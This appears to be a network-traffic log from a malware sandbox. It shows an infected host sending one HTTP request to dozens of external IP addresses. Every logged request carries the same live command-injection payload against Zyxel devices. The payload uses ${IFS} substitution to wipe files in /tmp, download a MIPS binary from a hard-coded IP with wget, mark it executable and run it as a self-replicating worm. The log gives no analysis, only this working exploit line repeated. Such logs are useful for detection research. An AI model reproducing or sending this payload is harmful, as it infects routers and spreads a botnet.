                                                        Jan 28, 2024 10:13:06.677711010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8013192.168.2.1433524222.26.102.49443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.677757978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8014192.168.2.1440844147.191.130.129443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.677792072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8015192.168.2.1445594159.74.21.111443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.677823067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8016192.168.2.1451354163.98.151.140443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.677865982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8017192.168.2.1439402118.112.10.255443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.677910089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8018192.168.2.145656660.113.34.142443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.677967072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8019192.168.2.1450526206.126.18.81443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.677999973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8020192.168.2.1442912124.74.220.151443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.678029060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8021192.168.2.1459120188.160.252.253443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.678078890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8022192.168.2.144536658.242.40.84443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.678116083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8023192.168.2.1460012182.204.27.214443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.678164959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8024192.168.2.1460468142.169.170.202443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.678193092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8025192.168.2.1445772162.155.118.126443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.678230047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8026192.168.2.1449690179.10.74.147443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.678277969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8027192.168.2.145967047.94.38.52443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.678334951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8028192.168.2.1436710105.59.15.148443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.678363085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8029192.168.2.144630289.24.117.213443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.678400040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8030192.168.2.1460934166.119.126.236443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.681579113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8031192.168.2.1442418219.84.142.68443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.682396889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8032192.168.2.14509065.124.91.35443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.682435989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8033192.168.2.1460778190.228.48.147443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.682490110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8034192.168.2.144418043.63.180.74443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.682526112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8035192.168.2.1433894114.167.22.255443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.682585955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8036192.168.2.1460072221.52.177.90443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.682626009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8037192.168.2.1437388105.232.74.139443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.682648897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8038192.168.2.1447062219.175.131.44443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.682703018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8039192.168.2.143939283.74.51.174443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.682730913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8040192.168.2.144267875.30.188.231443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.682801008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8041192.168.2.1455972104.56.218.209443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.682832003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8042192.168.2.1457598152.131.212.95443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.682857037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8043192.168.2.1438528101.106.239.41443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.682890892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8044192.168.2.1434446190.226.209.105443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.682956934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8045192.168.2.1442284132.99.177.104443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.682984114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8046192.168.2.1439326207.28.201.234443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.683020115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8047192.168.2.1452496173.80.217.63443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.683070898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8048192.168.2.1454128134.183.21.73443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.683101892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8049192.168.2.145465471.18.124.105443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.683154106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8050192.168.2.1450024193.32.114.133443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.683180094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8051192.168.2.1446370205.232.165.252443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.683214903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8052192.168.2.1446302116.127.172.38443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.683255911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8053192.168.2.144009095.191.53.213443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.683306932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8054192.168.2.1451088210.18.135.169443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.683366060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8055192.168.2.145657224.54.68.200443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.683398008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8056192.168.2.1439306194.18.97.146443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.683442116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8057192.168.2.1433656164.0.142.13443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.683470011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8058192.168.2.1447638151.90.225.74443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.683501005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8059192.168.2.1457152162.12.6.99443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.683537006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8060192.168.2.145654464.147.103.122443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.683568001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8061192.168.2.144245264.106.115.182443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.691421986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8062192.168.2.1458948104.5.223.4443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.691463947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8063192.168.2.1456434152.130.156.97443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.691504955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8064192.168.2.144598850.122.153.212443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.691545010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8065192.168.2.145990658.186.249.77443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.691576958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8066192.168.2.143514820.140.197.212443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.691601992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8067192.168.2.1440346172.223.39.117443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.691638947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8068192.168.2.1454220186.4.33.56443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.691699028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8069192.168.2.143870487.138.207.178443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.691740036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8070192.168.2.144823239.122.10.198443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.691775084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8071192.168.2.144724898.61.37.206443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.691817045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8072192.168.2.1433298218.48.152.152443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.691853046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8073192.168.2.144697297.16.242.79443
                                                        TimestampBytes transferredDirectionData
